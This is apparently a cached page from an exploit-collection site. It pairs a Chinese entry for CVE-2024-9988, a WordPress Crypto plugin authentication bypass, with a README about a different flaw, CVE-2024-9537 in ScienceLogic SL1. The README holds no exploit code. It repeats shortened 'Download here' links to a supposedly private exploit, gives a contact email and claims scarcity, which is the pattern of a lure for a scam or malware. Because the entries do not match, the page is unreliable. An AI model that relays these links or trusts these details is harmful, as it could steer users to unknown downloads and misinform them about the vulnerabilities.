Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-9988 PoC — WordPress plugin Crypto 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin Crypto 安全漏洞 (CVE-2024-9988)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Crypto 2.15版本及之前版本存在安全漏洞,该漏洞源于“crypto_connect_ajax_process::register”函数中缺少对提供的用户的验证。
Description
Authentication Bypass Using an Alternate Path or Channel
Readme
# CVE-2024-9537
# Overview
ScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component packaged with SL1.
# Exploit
## [**Download here**](https://bit.ly/4fbV8Cb) 
## Details 
+ **CVE ID**: CVE-2024-9537
+ **Published**: 10/18/2024
+ **Impact**: Unconfidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8

![image](https://github.com/user-attachments/assets/6887fbb1-f099-4045-a139-aa687895d57f)

## Vulnerability Description
This vulnerability has a critical severity with a CVSS v3.1 base score of 9.8 and a CVSS v4.0 base score of 9.3. It can be exploited over the network without requiring user interaction or privileges. The vulnerability has high impact on confidentiality, integrity, and availability of the affected systems. Given the network attack vector and low attack complexity, this vulnerability could potentially lead to unauthorized access, data breaches, and system compromise. The vulnerability is actively being exploited in the wild and was added to the CISA Known Exploited Vulnerability list.
## Affected versions 
SL1 versions 12.1.3+, 12.2.3+, and 12.3+. Remediations have been made available for all SL1 versions back to version lines 10.1.x, 10.2.x, 11.1.x, 11.2.x, and 11.3.x.
## [**Download here**](https://bit.ly/4f9R3hX) 
## Contact
+ **For inquiries, please contact: hatvixprime@outlook.com**
## [**Download here**](https://bit.ly/4fbV8Cb) (Only 4 hands)
![image](https://github.com/user-attachments/assets/1a37cb12-0a1f-488b-80c6-c539d25afcee)

File Snapshot

[4.0K] /data/pocs/034122e5ef811eefbfae043cb914e8d0d194c051 └── [1.5K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.